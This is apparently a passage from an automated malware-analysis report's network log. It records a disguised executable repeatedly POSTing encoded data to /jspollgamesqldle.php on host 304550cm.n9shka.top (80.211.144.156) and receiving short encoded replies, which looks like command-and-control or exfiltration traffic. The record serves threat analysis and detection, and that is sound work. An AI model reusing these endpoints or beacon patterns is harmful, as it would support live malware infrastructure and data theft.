                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:02.853390932 CEST2532OUTData Raw: 5b 50 59 56 5f 5a 5e 5b 5c 5a 51 56 57 5d 57 52 50 58 5e 59 54 5b 53 46 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [PYV_Z^[\ZQVW]WRPX^YT[SFTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&,12=: V8>#\0,9^;3/5-_+'^07,-#G X/9
                                                          Sep 8, 2024 11:53:03.162311077 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:03.296821117 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:02 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          68192.168.2.46475880.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:03.416939020 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:03.775230885 CEST2532OUTData Raw: 5e 59 59 56 5f 5a 5b 5b 5c 5a 51 56 57 58 57 52 50 5a 5e 5a 54 5d 53 46 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^YYV_Z[[\ZQVWXWRPZ^ZT]SFTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&/!9]?* ! ;*+_0,=//'*+6-2)&'[$7.#G X/-
                                                          Sep 8, 2024 11:53:04.085779905 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:04.212657928 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:03 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          69192.168.2.46475980.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:04.340317011 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:04.697263002 CEST2532OUTData Raw: 5b 5a 5c 56 5a 58 5b 5b 5c 5a 51 56 57 5e 57 56 50 58 5e 50 54 5f 53 47 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [Z\VZX[[\ZQVW^WVPX^PT_SGTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%/1%_);]!3$><$'?*;B?S%*8"-)?&3Z3#9#G X/5
                                                          Sep 8, 2024 11:53:05.028278112 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:05.160773039 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:04 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          70192.168.2.46476080.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:05.297557116 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:05.650242090 CEST2528OUTData Raw: 5e 5b 59 51 5f 5e 5b 58 5c 5a 51 56 57 5b 57 54 50 5b 5e 58 54 5d 53 41 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^[YQ_^[X\ZQVW[WTP[^XT]SATRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%],=?9\#0*/+'?9[-4('9"*)&0$8\.#G X/%
                                                          Sep 8, 2024 11:53:05.971498013 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:06.102442980 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:05 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          71192.168.2.46476180.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:06.233740091 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          72192.168.2.46476280.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:06.359931946 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1400
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:06.712753057 CEST1400OUTData Raw: 5e 59 5c 55 5f 5f 5b 5d 5c 5a 51 56 57 5b 57 54 50 5c 5e 5a 54 5e 53 45 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^Y\U__[]\ZQVW[WTP\^ZT^SETRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&/1*=)^# 0]>Z#]%?!]8($<52</38.#G X/%
                                                          Sep 8, 2024 11:53:07.026335001 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:07.229849100 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:06 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0d 11 25 0e 24 3f 03 5c 35 3e 2b 53 29 2c 21 50 2d 2d 34 5b 3e 5f 35 07 29 1d 38 55 29 11 26 5f 3f 2b 21 07 2b 3c 3b 03 20 1f 33 1f 26 35 28 5e 03 11 23 5e 23 3e 08 58 29 2a 29 07 29 57 2c 5e 29 2f 09 12 22 42 3c 52 23 38 34 11 37 38 2a 56 3c 29 2d 0e 3b 42 21 09 2d 33 32 54 21 34 2d 57 0c 12 20 57 28 10 3b 51 22 30 39 1b 25 00 1c 05 33 08 0b 00 29 28 3a 50 28 5e 32 59 24 22 05 1c 30 3d 32 03 2b 28 0c 15 24 07 3f 5b 36 2d 24 53 2d 0c 22 54 00 3d 5c 56
                                                          Data Ascii: %$?\5>+S),!P--4[>_5)8U)&_?+!+<; 3&5(^#^#>X)*))W,^)/"B<R#8478*V<)-;B!-32T!4-W W(;Q"09%3)(:P(^2Y$"0=2+($?[6-$S-"T=\V


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          73192.168.2.46476380.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:06.482542038 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:06.837805986 CEST2532OUTData Raw: 5e 5e 5c 52 5a 59 5e 58 5c 5a 51 56 57 5f 57 57 50 5c 5e 5b 54 58 53 44 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^^\RZY^X\ZQVW_WWP\^[TXSDTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%[/19_>*$7'*/33!-' 09 !%Z<6;Y'4\9#G X/1
                                                          Sep 8, 2024 11:53:07.167747021 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:07.300446987 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:06 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          74192.168.2.46476480.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:07.439924002 CEST295OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:53:07.791021109 CEST2532OUTData Raw: 5e 59 5c 51 5a 5f 5b 51 5c 5a 51 56 57 52 57 5d 50 5a 5e 50 54 5a 53 46 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^Y\QZ_[Q\ZQVWRW]PZ^PTZSFTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&,2>)+\! $Z)'0];T$#5!^?&+'7.#G X/
                                                          Sep 8, 2024 11:53:08.101349115 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:08.228708029 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:07 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          75192.168.2.46476580.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:08.355562925 CEST295OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:53:08.712928057 CEST2532OUTData Raw: 5b 5f 59 54 5a 5c 5e 5d 5c 5a 51 56 57 5d 57 50 50 5b 5e 5b 54 58 53 45 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [_YTZ\^]\ZQVW]WPP[^[TXSETRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&,%]?9< 8Y(?,0?\/B 094!6<&33$].#G X/9
                                                          Sep 8, 2024 11:53:09.028997898 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:09.238809109 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:08 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          76192.168.2.46476680.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:09.371566057 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:09.728389978 CEST2532OUTData Raw: 5e 5d 59 53 5f 5e 5b 5e 5c 5a 51 56 57 5d 57 5d 50 5b 5e 58 54 5c 53 41 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^]YS_^[^\ZQVW]W]P[^XT\SATRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&.!1[>)X#<]=$$;8%9["+&#'4Z.;#G X/9
                                                          Sep 8, 2024 11:53:10.056507111 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:10.263293982 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:09 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          77192.168.2.46476780.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:10.387953997 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:10.744009018 CEST2532OUTData Raw: 5b 5f 59 55 5a 5a 5b 51 5c 5a 51 56 57 5e 57 52 50 5c 5e 5b 54 58 53 40 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [_YUZZ[Q\ZQVW^WRP\^[TXS@TRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%[/:)9;_#/)+0?2;$$)/^">2(@$3<9;#G X/5
                                                          Sep 8, 2024 11:53:11.054888010 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:11.188795090 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:10 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          78192.168.2.46476880.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:11.310095072 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:11.665826082 CEST2532OUTData Raw: 5b 58 59 53 5a 58 5b 5f 5c 5a 51 56 57 52 57 51 50 5e 5e 5a 54 54 53 47 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [XYSZX[_\ZQVWRWQP^^ZTTSGTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%^/>)#48[* $/5Z8$/V094".2+3['78:;#G X/
                                                          Sep 8, 2024 11:53:11.977108002 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:12.180708885 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:11 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          79192.168.2.46476980.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:12.252726078 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1412
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          80192.168.2.46477080.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:12.310857058 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:12.665843964 CEST2532OUTData Raw: 5e 5d 5c 56 5a 52 5b 5e 5c 5a 51 56 57 52 57 5d 50 5b 5e 51 54 5e 53 48 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^]\VZR[^\ZQVWRW]P[^QT^SHTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%8Z=; ]=3]0?6;$0Y!.!Y?@;_$#.#G X/
                                                          Sep 8, 2024 11:53:13.177074909 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:13.193813086 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:13.197818995 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:12 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          81192.168.2.46477180.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:13.330307961 CEST295OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:53:13.681571960 CEST2532OUTData Raw: 5b 5f 5c 5e 5f 58 5b 5a 5c 5a 51 56 57 5d 57 52 50 5b 5e 5d 54 59 53 45 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [_\^_X[Z\ZQVW]WRP[^]TYSETRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%]82%^*;_733*/+]0?6/$'4!.?&/Z3;:#G X/9
                                                          Sep 8, 2024 11:53:14.003334045 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:14.208472967 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:13 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          82192.168.2.46477280.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:14.340343952 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:14.697081089 CEST2532OUTData Raw: 5b 50 5c 54 5a 5f 5e 58 5c 5a 51 56 57 5e 57 55 50 5b 5e 5f 54 58 53 41 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
